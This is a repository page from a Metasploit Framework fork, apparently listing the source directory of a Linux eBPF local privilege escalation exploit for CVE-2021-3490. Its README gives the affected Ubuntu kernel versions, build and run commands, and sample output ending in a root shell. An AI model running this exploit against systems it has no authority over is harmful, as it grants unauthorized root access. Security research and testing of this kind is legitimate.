dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490
History
Grant Willcox 3bca3b0bcb
Update exploit code to use & after the command to execute as root so it executes in the background and doesn't hang Metasploit. Also update the logic of the code to check the response from executing the exploit and respond accordingly and update the documentation to match 		2021-08-31 15:07:37 -05:00
..
include Add support for Linux 5.11.x on Fedora 2021-08-23 15:09:10 -05:00
Makefile Add support for Linux 5.11.x on Fedora 2021-08-23 15:09:10 -05:00
README.md Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come 2021-08-17 18:01:14 -05:00
bpf.c Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come 2021-08-17 18:01:14 -05:00
exploit.c Update exploit code to use & after the command to execute as root so it executes in the background and doesn't hang Metasploit. Also update the logic of the code to check the response from executing the exploit and respond accordingly and update the documentation to match 2021-08-31 15:07:37 -05:00
kmem_search.c Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come 2021-08-17 18:01:14 -05:00

README.md

Linux_LPE_eBPF_CVE-2021-3490

LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. The vulnerability was discovered by Manfred Paul @_manfp and fixed in this commit.

author: @chompie1337

For educational/research purposes only. Use at your own risk.

Usage:

To build for Ubuntu 20.10 (Groovy Gorilla):

make groovy

To build for Ubuntu 21.04 (Hirsute Hippo):

make hirsute

To run:

bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

Note: You must cleanly exit the root shell by typing exit to perform cleanup and avoid a kernel panic.

Checkout the writeup Kernel Pwning with eBPF: a Love Story.

This research was sponsered by Grapl.